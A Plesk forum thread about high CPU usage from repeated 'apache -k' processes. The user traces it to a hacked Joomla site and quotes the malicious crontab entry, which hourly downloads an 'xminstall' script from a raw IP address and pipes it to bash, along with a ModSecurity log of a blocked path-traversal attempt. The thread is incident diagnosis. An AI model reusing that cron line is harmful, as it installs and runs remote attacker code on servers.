• We value your experience with Plesk during 2024
    Plesk strives to perform even better in 2025. To help us improve further, please answer a few questions about your experience with Plesk Obsidian 2024.
    Please take this short survey:

    https://pt-research.typeform.com/to/AmZvSXkx

  • We are developing a new feature in Plesk that will help you promote your websites or business on social media. We want to conduct a one-hour online UX test to present the prototype and collect feedback. If you are interested in the feature, please book a meeting via this link.
    Thank you in advance!
  • The Horde webmail has been deprecated. Its complete removal is scheduled for April 2025. For details and recommended actions, see the Feature and Deprecation Plan.
  • We’re working on enhancing the Monitoring feature in Plesk, and we could really use your expertise! If you’re open to sharing your experiences with server and website monitoring or providing feedback, we’d love to have a one-hour online meeting with you.

Question High CPU usage process issue (apache -k)

Nicola

Basic Pleskian
Hi,
I have a problem with a domain, sometimes starting many processes that completely used the CPU (image attached). I can't find a solution and even looking on the internet I can't find anything about it.

What could I do to investigate further?

Thanks in advance
 

Attachments

  • processi.jpg
    processi.jpg
    126.5 KB · Views: 7
If I posted it's because I had already done the research.

More specifically, my question is: what are the processes with "apache -k" that you see in the image?
Can anyone tell me what it could be?
 
apache -k is used for an apache shutdown or restart. any indication in the logs what is causing the apache restarts?
 
joomla site was hacked. I found this in the user's crontab


Code:
MAILTO=""
1 * * * * (wget -q http://157.245.235.139/s/xminstall -O - || curl -fs http://157.245.235.139/s/xminstall)|bash

Looking at the logs I found this

Code:
[client 196.112.130.200] ModSecurity: [file "/etc/httpd/conf/modsecurity.d/rules/tortix/modsec/50_plesk_basic_asl_rules.conf"] [line "39"] [id "33340006"] [rev "68"] [msg "Protected by Atomicorp.com Basic Non-Realtime WAF Rules: Generic Path Recursion denied in URI/ARGS"] [data "../../,ARGS:albumid"] [severity "CRITICAL"] Access denied with code 403 (phase 2). Pattern match "\\\\.\\\\./\\\\.\\\\./" at ARGS:albumid. [hostname "old.cpia5milanocentrale.edu.it"] [uri "/index.php"] [unique_id "XZt@6RESvUG9QNLiorugrwAAANg"]
 
Back
Top